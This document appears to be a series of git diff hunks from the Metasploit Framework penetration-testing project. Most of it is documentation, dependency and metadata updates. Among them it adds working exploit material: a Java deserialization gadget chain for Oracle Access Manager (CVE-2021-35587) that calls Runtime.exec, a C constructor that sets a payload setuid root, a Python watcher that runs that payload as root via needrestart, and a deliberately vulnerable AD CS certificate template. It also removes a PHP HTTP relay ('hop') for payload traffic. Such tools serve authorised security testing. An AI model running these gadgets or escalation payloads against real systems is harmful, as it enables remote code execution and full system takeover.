+  - 2.5.29.15
+pKIExtendedKeyUsage:
+# Server Authentication OID (Not necessary although if left blank this template would also be vulnerable to ESC2)
+  - 1.3.6.1.5.5.7.3.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
+msPKI-Minimal-Key-Size: 2048
@@ -249,7 +249,7 @@ queries:
      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
  - action: ENUM_LAPS_PASSWORDS
-    description: 'Dump info about computers that have LAPS enabled, and passwords for them if available.'
+    description: 'Dump info about computers that have LAPS v1 enabled, and passwords for them if available.'
    filter: '(ms-MCS-AdmPwd=*)'
    attributes:
      - cn
@@ -387,3 +387,12 @@ queries:
    references:
      - https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
      - https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
+  - action: ENUM_SCCM_MANAGEMENT_POINTS
+    description: 'Find all registered SCCM/MECM management points'
+    filter: '(objectclass=mssmsmanagementpoint)'
+    attributes:
+      - cn
+      - dNSHostname
+      - msSMSSiteCode
+    references:
+      - https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/RECON/RECON-1/recon-1_description.md
@@ -13,4 +13,4 @@ responsible for corrupting the Metasploit Framework installation.

 For more information about EICAR, please see the following web site:

-http://www.eicar.org/anti_virus_test_file.htm
+https://www.eicar.org/download-anti-malware-testfile/
@@ -0,0 +1,136 @@
+// This gadget chain targets Oracle Access Manager on WebLogic (CVE-2021-35587) and is based upon:
+// * Y4er: https://github.com/Y4er/CVE-2020-2883/blob/master/CVE_2020_2883.java
+// * Jang: https://twitter.com/testanull/status/1502114473989279744
+//
+// Tested against Oracle Access Manager version:
+// * 12.2.1.4.0
+// * 12.2.1.3.0
+//
+// Note: The classes used in this chain do not have a serialVersionUID explicitly defined, so the JVM will compute one.
+// This has the effect that if the class changes between versions, the computed serialVersionUID will differ between
+// versions. As such we need to account for this, and generate the gadget for the different versions.
+//
+// We collect these JAR files from the OAM install (actually part of the WebLogic application server).
+// $ sha1sum **/*
+// 6de9309c3bcbc0478da85a8f60325c4ee5419cf1  12.2.1.3.0/coherence.jar
+// d58cf115884e1ae76fb0e7b8e022f7447af63a66  12.2.1.3.0/com.bea.core.weblogic.rmi.client.jar
+// ba45c235668885dff671eff34ee1b6ca57aefa6a  12.2.1.4.0/coherence.jar
+// d3f2e0778774123ae19654ad0960600bddf79389  12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar
+//
+// We can see the serialVersionUID changes for the classes in coherence.jar, for example:
+// $ serialver -classpath 12.2.1.3.0/coherence.jar com.tangosol.util.comparator.ExtractorComparator
+// com.tangosol.util.comparator.ExtractorComparator:    private static final long serialVersionUID = -339238653537079588L;
+// $ serialver -classpath 12.2.1.4.0/coherence.jar com.tangosol.util.comparator.ExtractorComparator
+// com.tangosol.util.comparator.ExtractorComparator:    private static final long serialVersionUID = -453812047863165663L;
+//
+// We can see the serialVersionUID does not change for BasicServiceContext:
+// $ serialver -classpath 12.2.1.3.0/com.bea.core.weblogic.rmi.client.jar weblogic.rmi.provider.BasicServiceContext
+// weblogic.rmi.provider.BasicServiceContext:    private static final long serialVersionUID = -1989708991725000930L;
+// $ serialver -classpath 12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar weblogic.rmi.provider.BasicServiceContext
+// weblogic.rmi.provider.BasicServiceContext:    private static final long serialVersionUID = -1989708991725000930L;
+//
+// Compile with:
+// $ javac -cp 12.2.1.4.0/coherence.jar:12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar gadget.java
+//
+// Run with:
+// $ java --add-opens java.base/java.util=ALL-UNNAMED -cp 12.2.1.4.0/coherence.jar:12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar:. gadget
+//
+// Save the output for that version:
+// $ mv gadget.bin gadget_12.2.1.4.0.bin
+//
+// We then get the following gadget chains:
+// $ sha1sum *.bin
+// 1326ef6fe634e2e2bb83705507d766efbfcfc141  gadget_12.2.1.3.0.bin
+// fad1e1e243dd9aca09658893737341008ef27096  gadget_12.2.1.4.0.bin
+import java.io.*;
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+
+// coherence.jar
+import com.tangosol.util.ValueExtractor;
+import com.tangosol.util.comparator.ExtractorComparator;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+
+// com.bea.core.weblogic.rmi.client.jar
+import weblogic.rmi.provider.BasicServiceContext;
+
+public class gadget {
+
+    public static void main(String[] args) throws Exception
+    {
+        ReflectionExtractor reflectionExtractor1 = new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[]{}});
+        ReflectionExtractor reflectionExtractor2 = new ReflectionExtractor("invoke", new Object[]{null, new Object[]{}});
+        ReflectionExtractor reflectionExtractor3 = new ReflectionExtractor("exec", new Object[]{new String[]{"EXEC_ARG0", "EXEC_ARG1", "EXEC_ARG2"}});
+
+        ValueExtractor[] valueExtractors = new ValueExtractor[]{
+                reflectionExtractor1,
+                reflectionExtractor2,
+                reflectionExtractor3,
+        };
+
+        Class clazz = ChainedExtractor.class.getSuperclass();
+        Field m_aExtractor = clazz.getDeclaredField("m_aExtractor");
+        m_aExtractor.setAccessible(true);
+
+        ReflectionExtractor reflectionExtractor = new ReflectionExtractor("toString", new Object[]{});
+        ValueExtractor[] valueExtractors1 = new ValueExtractor[]{
+                reflectionExtractor
+        };
+
+        ChainedExtractor chainedExtractor1 = new ChainedExtractor(valueExtractors1);
+
+        PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor1));
+        queue.add("1");
+        queue.add("1");
+        m_aExtractor.set(chainedExtractor1, valueExtractors);
+
+        Field field = PriorityQueue.class.getDeclaredField("queue");
+        field.setAccessible(true);
+
+        Object[] queueArray = (Object[]) field.get(queue);
+
+        queueArray[0] = Runtime.class;
+        queueArray[1] = "1";
+
+        BasicServiceContext bsc = new BasicServiceContext(1, queue, false);
+
+        byte[] bytes = serialize(bsc);
+        StringBuilder sb = new StringBuilder();
+        for (byte b : bytes) {
+            sb.append(String.format("%02x", b));
+        }
+        System.out.println(sb.toString());
+
+		FileOutputStream fos = new FileOutputStream("gadget.bin");
+		ObjectOutputStream os = new ObjectOutputStream(fos);
+		os.writeObject(bsc);
+		os.close();
+
+        //deserialize(bytes);
+    }
+
+    public static byte[] serialize(final Object obj) throws IOException {
+        final ByteArrayOutputStream out = new ByteArrayOutputStream();
+        serialize(obj, out);
+        return out.toByteArray();
+    }
+
+    public static void serialize(final Object obj, final OutputStream out) throws IOException {
+        final ObjectOutputStream objOut = new ObjectOutputStream(out);
+        objOut.writeObject(obj);
+        objOut.flush();
+        objOut.close();
+    }
+
+    public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
+        final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
+        return deserialize(in);
+    }
+
+    public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
+        final ObjectInputStream objIn = new ObjectInputStream(in);
+        return objIn.readObject();
+    }
+
+}
@@ -0,0 +1,27 @@
+/*
+// system call
+#include <stdlib.h>
+// setuid, setgid
+#include <unistd.h>
+
+static void a() __attribute__((constructor));
+
+void a() {
+  setuid(0);
+  setgid(0);
+  const char *shell = "chown root:root PAYLOAD_PATH; chmod a+x PAYLOAD_PATH; chmod u+s PAYLOAD_PATH &";
+  system(shell);
+}
+*/
+
+extern int setuid(int);
+extern int setgid(int);
+extern int system(const char *__s);
+
+void a(void) __attribute__((constructor));
+
+void __attribute__((constructor)) a() {
+  setuid(0);
+  setgid(0);
+  system("chown root:root 'PAYLOAD_PATH'; chmod a+x,u+s 'PAYLOAD_PATH'");
+}
@@ -0,0 +1,17 @@
+import os
+import time
+import pwd
+
+print("#########################\n\nDont mind the error message above\n\nWaiting for needrestart to run...")
+
+while True:
+    try:
+        file_stat = os.stat('PAYLOAD_PATH')
+    except FileNotFoundError:
+        exit()
+    username = pwd.getpwuid(file_stat.st_uid).pw_name
+    #print(f"Payload owned by: {username}. Stats: {file_stat}")
+    if (username == 'root'):
+        os.system('PAYLOAD_PATH &')
+        exit()
+    time.sleep(1)
@@ -1,68 +0,0 @@
-<?php
-$magic = 'TzGq';
-$tempdir = sys_get_temp_dir() . "/hop" . $magic;
-if(!is_dir($tempdir)){
-	mkdir($tempdir); //make sure it's there
-}
-
-//get url
-$url = $_SERVER["QUERY_STRING"];
-//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
-
-//Looks for a file with a name or contents prefix, if found, send it and deletes it
-function findSendDelete($tempdir, $prefix, $one=true){
-	if($dh = opendir($tempdir)){
-		while(($file = readdir($dh)) !== false){
-			if(strpos($file, $prefix) !== 0){
-				continue;
-			}
-			readfile($tempdir."/".$file);
-			unlink($tempdir."/".$file);
-			if($one){
-				break;
-			}
-		}
-	}
-}
-
-//handle control
-if($url === "/control"){
-	if($_SERVER['REQUEST_METHOD'] === 'POST'){
-		//handle data for payload - save in a "down" file or the "init" file
-		$postdata = file_get_contents("php://input");
-		if(array_key_exists('HTTP_X_INIT', $_SERVER)){
-			$f = fopen($tempdir."/init", "w"); //only one init file
-		}else{
-			$prefix = "down_" . sha1($_SERVER['HTTP_X_URLFRAG']);
-			$f = fopen(tempnam($tempdir,$prefix), "w");
-		}
-		fwrite($f, $postdata);
-		fclose($f);
-	}else{
-		findSendDelete($tempdir, "up_", false);
-	}
-}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
-	//get data
-	$postdata = file_get_contents("php://input");
-	//See if we should send anything down
-	if($postdata === "RECV\x00" || $postdata === "RECV"){
-		findSendDelete($tempdir, "down_" . sha1($url));
-		$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
-	}else{
-		$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
-	}
-	//find free and write new file
-	$f = fopen($fname, "w");
-	fwrite($f, $magic);
-	//Little-endian pack length and data
-	$urlen = strlen($url);
-	fwrite($f, pack('V', $urlen));
-	fwrite($f, $url);
-	$postdatalen = strlen($postdata);
-	fwrite($f, pack('V', $postdatalen));
-	fwrite($f, $postdata);
-	fclose($f);
-//Initial query will be a GET and have a 12345 in it
-}else if(strpos($url, "12345") !== FALSE){
-	readfile($tempdir."/init");
-}
@@ -9,7 +9,7 @@ ehdr:                            ; Elf32_Ehdr
  db    0, 0, 0, 0,  0, 0, 0, 0  ;
  dw    2                        ;   e_type       = ET_EXEC for an executable
  dw    0xB7                     ;   e_machine    = AARCH64
-  dd    0                        ;   e_version
+  dd    1                        ;   e_version
  dq    _start                   ;   e_entry
  dq    phdr - $$                ;   e_phoff
  dq    0                        ;   e_shoff
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_x64_template.s -f bin -o template_x64_linux.bin
+
+BITS 64
+
+org 0x0000000000400000
+
+ehdr:                            ; Elf64_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0x3e                     ;   e_machine
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf64_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0x4141414141414141       ;   p_filesz
+  dq    0x4242424242424242       ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -1,70 +1,70 @@
-wordpress-popular-posts
-backup
-catch-themes-demo-import
-modern-events-calendar-lite
-ninja-forms
-simple-file-list
-sp-client-document-manager
-drag-and-drop-multiple-file-upload-contact-form-7
-wp-file-manager
-duplicator
-work-the-flow-file-upload
 ajax-load-more
-wpdiscuz
-wptouch
-front-end-editor
-wpshop
-plainview-activity-monitor
-sexy-contact-form
+all-in-one-wp-migration
+backup
+backup-backup
+boldgrid-backup
+bookingpress
+bulletproof-security
+catch-themes-demo-import
+chopslider
+custom-registration-form-builder-with-submission-manager
 download-manager
+drag-and-drop-multiple-file-upload-contact-form-7
+dukapress
+duplicator
+duplicator_download
+easy-wp-smtp
+elementor
+email-subscribers
+file-manager-advanced-shortcode
+front-end-editor
+gi-media-library
+give
+hash-form
 inboundio-marketing
-wp-mobile-detector
-website-contact-form-with-file-upload
-slideshow-gallery
-reflex-gallery
-wp-symposium
+learnpress
+loginizer
+masterstudy-lms-learning-management-system
+modern-events-calendar-lite
+modern-events-calendar-lite
+nextgen-gallery
+ninja-forms
+paid-memberships-pro
+perfect-survey
 photo-gallery
 pie-register
-wysija-newsletters
-dzs-zoomsounds
-all-in-one-wp-migration
-wp-ultimate-csv-importer
-wp-symposium
-masterstudy-lms-learning-management-system
-wp-gdpr-compliance
-wp-automatic
-wp-easycart
-dukapress
-loginizer
-email-subscribers
-wps-hide-login
-secure-copy-content-protection
-wordpress-mobile-pack
-learnpress
-wp-mobile-edition
-boldgrid-backup
-modern-events-calendar-lite
-gi-media-library
-chopslider
-bulletproof-security
-nextgen-gallery
-simple-backup
-subscribe-to-comments
-easy-wp-smtp
-duplicator_download
-custom-registration-form-builder-with-submission-manager
-woocommerce-abandoned-cart
-elementor
-bookingpress
-paid-memberships-pro
-woocommerce-payments
-file-manager-advanced-shortcode
-royal-elementor-addons
-backup-backup
-hash-form
-give
-ultimate-member
-wp-fastest-cache
+plainview-activity-monitor
 post-smtp
 really-simple-ssl
-perfect-survey
+reflex-gallery
+royal-elementor-addons
+secure-copy-content-protection
+sexy-contact-form
+simple-backup
+simple-file-list
+slideshow-gallery
+sp-client-document-manager
+subscribe-to-comments
+ultimate-member
+website-contact-form-with-file-upload
+woocommerce-abandoned-cart
+woocommerce-payments
+wordpress-mobile-pack
+wordpress-popular-posts
+work-the-flow-file-upload
+wp-automatic
+wp-easycart
+wp-fastest-cache
+wp-file-manager
+wp-gdpr-compliance
+wp-mobile-detector
+wp-mobile-edition
+wp-symposium
+wp-symposium
+wp-time-capsule
+wp-ultimate-csv-importer
+wpdiscuz
+wps-hide-login
+wpshop
+wptouch
+wysija-newsletters
@@ -1,3 +1,3 @@
+bricks
 holding_pattern
 wplms
-bricks
@@ -1,2 +1,10 @@
-Contains `modules_metadata_base.json` which contains information about all modules within Metasploit, as well as
-`schema.rb` which describes current state of the database schema maintained by Rails ActiveRecord.
+This directory contains the following files:
+
+- `modules_metadata_base.json`, which contains information about all modules within Metasploit.
+- `schema.rb`, which is auto-generated from the current state of the database schema maintained by Rails ActiveRecord.
+  This file is auto-generated from the current state of the database.
+
+`schema.rb` is the source Rails uses to define your schema when running `bin/rails db:schema:load`. When creating a new 
+database, `bin/rails db:schema:load` tends to be faster and is potentially less error-prone than running all of your 
+migrations from scratch. Old migrations may fail to apply correctly if those migrations use external dependencies or 
+application code. We _strongly_ recommend that you check this file into your version control system.
@@ -10,7 +10,7 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema[7.0].define(version: 2022_12_09_005658) do
+ActiveRecord::Schema[7.1].define(version: 2025_02_04_172657) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

@@ -314,6 +314,7 @@ ActiveRecord::Schema[7.0].define(version: 2022_12_09_005658) do
    t.datetime "created_at", precision: nil, null: false
    t.datetime "updated_at", precision: nil, null: false
    t.string "jtr_format"
+    t.jsonb "metadata", default: {}, null: false
    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_pkcs12", unique: true, where: "((type)::text = 'Metasploit::Credential::Pkcs12'::text)"
    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)"
    t.index ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT (((type)::text = 'Metasploit::Credential::SSHKey'::text) OR ((type)::text = 'Metasploit::Credential::Pkcs12'::text)))"
@@ -6,6 +6,7 @@ gem 'just-the-docs', github: 'rapid7/just-the-docs', branch: 'r7_ver_custom'
 #gem 'just-the-docs', path: '../../just-the-docs'
 gem 'webrick'
 gem 'rexml'
+gem 'jekyll-sass-converter', '~> 2.2.0'

 group :jekyll_plugins do
  gem 'jekyll-sitemap'
@@ -12,22 +12,22 @@ GIT
 GEM
  remote: https://rubygems.org/
  specs:
-    addressable (2.8.1)
-      public_suffix (>= 2.0.2, < 6.0)
+    addressable (2.8.7)
+      public_suffix (>= 2.0.2, < 7.0)
    byebug (11.1.3)
    coderay (1.1.3)
    colorator (1.1.0)
-    concurrent-ruby (1.1.10)
+    concurrent-ruby (1.3.5)
    em-websocket (0.5.3)
      eventmachine (>= 0.12.9)
      http_parser.rb (~> 0)
    eventmachine (1.2.7)
-    ffi (1.15.5)
+    ffi (1.17.1)
    forwardable-extended (2.6.0)
    http_parser.rb (0.8.0)
-    i18n (1.12.0)
+    i18n (1.14.7)
      concurrent-ruby (~> 1.0)
-    jekyll (4.3.1)
+    jekyll (4.3.4)
      addressable (~> 2.4)
      colorator (~> 1.0)
      em-websocket (~> 0.5)
@@ -53,46 +53,45 @@ GEM
      jekyll (>= 3.7, < 5.0)
    jekyll-watch (2.2.1)
      listen (~> 3.0)
-    kramdown (2.4.0)
-      rexml
+    kramdown (2.5.1)
+      rexml (>= 3.3.9)
    kramdown-parser-gfm (1.1.0)
      kramdown (~> 2.0)
-    liquid (4.0.3)
-    listen (3.7.1)
+    liquid (4.0.4)
+    listen (3.9.0)
      rb-fsevent (~> 0.10, >= 0.10.3)
      rb-inotify (~> 0.9, >= 0.9.10)
    mercenary (0.4.0)
-    method_source (1.0.0)
+    method_source (1.1.0)
    pathutil (0.16.2)
      forwardable-extended (~> 2.6)
-    pry (0.14.1)
+    pry (0.14.2)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.10.1)
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
-    public_suffix (5.0.1)
-    rake (13.0.6)
+    public_suffix (6.0.1)
+    rake (13.2.1)
    rb-fsevent (0.11.2)
-    rb-inotify (0.10.1)
+    rb-inotify (0.11.1)
      ffi (~> 1.0)
-    rexml (3.3.6)
-      strscan
-    rouge (4.0.0)
+    rexml (3.4.1)
+    rouge (4.5.1)
    safe_yaml (1.0.5)
    sassc (2.4.0)
      ffi (~> 1.9)
-    strscan (3.1.0)
    terminal-table (3.0.2)
      unicode-display_width (>= 1.1.1, < 3)
-    unicode-display_width (2.3.0)
-    webrick (1.7.0)
+    unicode-display_width (2.6.0)
+    webrick (1.9.1)

 PLATFORMS
  ruby

 DEPENDENCIES
  jekyll (~> 4.3.0)
+  jekyll-sass-converter (~> 2.2.0)
  jekyll-sitemap
  just-the-docs!
  pry-byebug
@@ -103,4 +102,4 @@ DEPENDENCIES
  webrick

 BUNDLED WITH
-   2.2.22
+   2.5.10
@@ -146,7 +146,7 @@ register_options(
  ], self.class)
 ```

-**8. Neglecting to use send_request_cgi()'s vars_get or vars_get when crafting a POST/GET request**
+**8. Neglecting to use send_request_cgi()'s vars_post or vars_get when crafting a POST/GET request**

 ```ruby
 data_post = 'user=jsmith&pass=hello123'
@@ -199,4 +199,4 @@ Metasploit3.new
 ```ruby
 # https://github.com/rapid7/metasploit-framework/issues/3853
 datastore['BAD'] = 'This is bad.'
-```
+```
@@ -112,6 +112,11 @@ end
    * **Reliability** - The Reliability field describes how reliable the session is that gets returned by the exploit, ex: `REPEATABLE_SESSION`, `UNRELIABLE_SESSION`
    * **SideEffects** - The SideEffects field describes the side effects cause by the exploit that the user should be aware of, ex: `ARTIFACTS_ON_DISK`, `IOC_IN_LOGS`, `ACCOUNT_LOCKOUTS`.

+### Non-required fields
+
+* **Stance** - The types of stances an exploit can take, such as passive or aggressive. Stances indicate whether or not the module triggers the exploit without waiting for one or more conditions to be met (aggressive) or whether it must wait for certain conditions to be satisfied before the exploit can be initiated (passive). Passive exploits usually would wait for interaction from a client or other entity for being able to trigger the vulnerability.
+
+* **Passive** - Either `true` or `false` indicates whether or not the exploit should be run as a background job. If for example you know the vulnerability takes an hour to trigger, setting `Passive` to `true` would be beneficial as it allows the user to continue using msfconsole while waiting for a response from the exploit.

 Your exploit should also have a `check` method to support the check command, but this is optional in case it's not possible.

@@ -201,7 +201,7 @@ This data breaks down to the following table:
 | MSCash2                              | mscash2-hashcat    | `$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f`                                                                                                                                                                                                                     | hashcat      | mscash2              |                                                  | auxiliary/analyze/crack_windows                           |
 | MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql                | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
-| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password1!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql                | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1           | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle           | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
@@ -18,7 +18,7 @@ Metasploit's DNS configuration is controlled by the `dns` command which has mult

 The current configuration can be printed by running `dns print`:

-```msf6
+```msf
 msf6 > dns print
 Default search domain: N/A
 Default search list:   lab.lan
@@ -23,34 +23,27 @@ msf5 auxiliary(scanner/oracle/oracle_hashdump) > run
 The general steps to getting Oracle support working are to install the Oracle Instant Client and development libraries, install the required dependencies for Kali Linux, then install the gem.

 ## Install the Oracle Instant Client
-As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](http://www.oracle.com/technetwork/database/features/instant-client/index-097480.html) packages for your version of Kali Linux. The packages you will need are:
+As root, create the directory `/opt/oracle`. Then download the [Oracle Instant Client](https://www.oracle.com/database/technologies/instant-client/downloads.html) packages for your version of Kali Linux. The packages you will need are:

-* instantclient-basic-linux-12.2.0.1.0.zip
-* instantclient-sqlplus-linux-12.2.0.1.0.zip
-* instantclient-sdk-linux-12.2.0.1.0.zip
+* [instantclient-basic-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-basic-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sqlplus-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sqlplus-linux.x64-23.6.0.24.10.zip)
+* [instantclient-sdk-linux.x64-23.6.0.24.10.zip](https://download.oracle.com/otn_software/linux/instantclient/2360000/instantclient-sdk-linux.x64-23.6.0.24.10.zip)

-Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_12_2/`. Next symlink the shared library that we need to access the library from oracle:
-
-```
-root@kali:/opt/oracle/instantclient_12_2# ln libclntsh.so.12.1 libclntsh.so
-
-root@kali:/opt/oracle/instantclient_12_2# ls -lh libclntsh.so
-lrwxrwxrwx 1 root root 17 Jun  1 15:41 libclntsh.so -> libclntsh.so.12.1
-```
+Unzip these under `/opt/oracle`, and you should now have a path called `/opt/oracle/instantclient_23_6/`.

 You also need to configure the appropriate environment variables, perhaps by inserting them into your .bashrc file, logging out and back in for them to apply.

 ```
-export PATH=$PATH:/opt/oracle/instantclient_12_2
-export SQLPATH=/opt/oracle/instantclient_12_2
-export TNS_ADMIN=/opt/oracle/instantclient_12_2
-export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_2
-export ORACLE_HOME=/opt/oracle/instantclient_12_2
+export PATH=$PATH:/opt/oracle/instantclient_23_6
+export SQLPATH=/opt/oracle/instantclient_23_6
+export TNS_ADMIN=/opt/oracle/instantclient_23_6
+export LD_LIBRARY_PATH=/opt/oracle/instantclient_23_6
+export ORACLE_HOME=/opt/oracle/instantclient_23_6
 ```

 If you have succeeded, you should be able to run `sqlplus` from a command prompt:
 ```
-root@kali:/opt/oracle/instantclient_12_2# sqlplus
+root@kali:/opt/oracle/instantclient_23_6# sqlplus

 SQL*Plus: Release 12.2.0.1.0 Production on Tue Mar 26 20:40:24 2019

@@ -64,40 +57,40 @@ Enter user-name:
 First, download and extract the gem source release:

 ```
-root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip
+root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
+--2019-03-26 20:31:11--  https://github.com/kubo/ruby-oci8/archive/refs/tags/ruby-oci8-2.2.14.zip
 Resolving github.com (github.com)... 192.30.253.113, 192.30.253.112
 Connecting to github.com (github.com)|192.30.253.113|:443... connected.
 HTTP request sent, awaiting response... 302 Found
-Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7 [following]
--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7
+Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14 [following]
+--2019-03-26 20:31:11--  https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.14
 Resolving codeload.github.com (codeload.github.com)... 192.30.253.120, 192.30.253.121
 Connecting to codeload.github.com (codeload.github.com)|192.30.253.120|:443... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: unspecified [application/zip]
-Saving to: 'ruby-oci8-2.2.7.zip'
+Saving to: 'ruby-oci8-2.2.14.zip'

-ruby-oci8-2.2.7.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    
+ruby-oci8-2.2.14.zip                     [ <=>                                                                ] 376.97K  2.36MB/s    in 0.2s    

-2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.7.zip' saved [386016]
+2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.14.zip' saved [386016]

-root@kali:~# unzip ruby-oci8-2.2.7.zip 
-Archive:  ruby-oci8-2.2.7.zip
+root@kali:~# unzip ruby-oci8-2.2.14.zip 
+Archive:  ruby-oci8-2.2.14.zip
 0c85bf6da2f541de3236267b1a1b18f0136a8f5a
-   creating: ruby-oci8-ruby-oci8-2.2.7/
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.gitignore  
-  inflating: ruby-oci8-ruby-oci8-2.2.7/.travis.yml 
+   creating: ruby-oci8-ruby-oci8-2.2.14/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.gitignore  
+  inflating: ruby-oci8-ruby-oci8-2.2.14/.travis.yml 
 [...]
-  inflating: ruby-oci8-ruby-oci8-2.2.7/test/test_rowid.rb
-root@kali:~# cd ruby-oci8-ruby-oci8-2.2.7/
+  inflating: ruby-oci8-ruby-oci8-2.2.14/test/test_rowid.rb
+root@kali:~# cd ruby-oci8-ruby-oci8-2.2.14/
 ```

 Install libgmp (needed to build the gem) and set the path to prefer the correct version of ruby so that Metasploit can use it.

 ```
-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# export PATH=/opt/metasploit/ruby/bin:$PATH
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# export PATH=/opt/metasploit/ruby/bin:$PATH

-root@kali:~/ruby-oci8-ruby-oci8-2.2.7# apt-get install libgmp-dev
+root@kali:~/ruby-oci8-ruby-oci8-2.2.14# apt-get install libgmp-dev
 Reading package lists... Done
